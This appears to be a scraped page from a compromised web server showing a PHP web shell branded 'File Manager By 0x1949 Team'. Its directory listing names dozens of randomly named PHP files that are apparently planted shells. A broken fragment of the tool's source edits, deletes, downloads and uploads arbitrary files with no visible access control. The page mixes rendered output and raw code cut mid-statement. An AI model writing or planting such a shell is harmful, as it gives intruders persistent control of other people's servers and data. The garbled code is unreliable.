File Manager
Files in the directory:
.well-known
0x19491KIIJ7.php
0x19494CY6TN.php
0x19495GAPA5.php
0x1949AXRFVW.php
0x1949DIP3ND.php
0x1949F6G92I.php
0x1949GZWMXQ.php
0x1949ICSYZX.php
0x1949QYLKWH.php
0x1949SDV0GF.php
0x1949SJPF28.php
0x1949SU65LU.php
0x1949VM6VYI.php
101CC666423A49AB9716675D6A3AE4B8.txt
cgi-bin
error_log
fazemrx1949_1lx9d0s7.php
fazemrx1949_5ssL3Fg4.php
fazemrx1949_8GGQufJE.php
fazemrx1949_BQmbEfYc.php
fazemrx1949_CeOKQVDR.php
fazemrx1949_WPmYFaQd.php
fazemrx1949_XFlcK35r.php
fazemrx1949_ZmVHkeRx.php
fazemrx1949_cNUX7mXc.php
fazemrx1949_m5A1VFZW.php
fazemrx1949_mrXVMgMt.php
fazemrx1949_o3UOGM08.php
fazemrx1949_o9vpsKPW.php
fazemrx1949_u0i7pF76.php
utchiha_0pysNPsx.php
utchiha_3mzxCjM7.php
utchiha_BnfgdLp1.php
utchiha_DD9Ns3IL.php
utchiha_HH5mgZwm.php
utchiha_KiNZ1zZq.php
utchiha_Of03zivA.php
utchiha_RmHf4ZGU.php
utchiha_YQjflAbL.php
utchiha_aKHt9Cj8.php
utchiha_e7gH8oLL.php
utchiha_gmJodmAN.php
utchiha_w6P1zx1V.php
utchiha_wAQVAfMS.php
utchiha_xZd3WMzI.php
utchiha_xu5d7tBV.php
utchiha_y9GFpD1X.php
Upload a File
Upload
Edit File: 0x19491KIIJ7.php
File '$filename' has been updated.
"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "
File '$filename' has been deleted.
"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "
File '$uploadedFilename' has been uploaded.
"; } else { echo "
Error uploading file '$uploadedFilename'.
"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?>
File Manager
File Manager By 0x1949 Team
Files in the directory:
" . $file . ""; } } ?>
Upload a File
Upload
Edit File:
Save
Download
Delete
Save
Download
Delete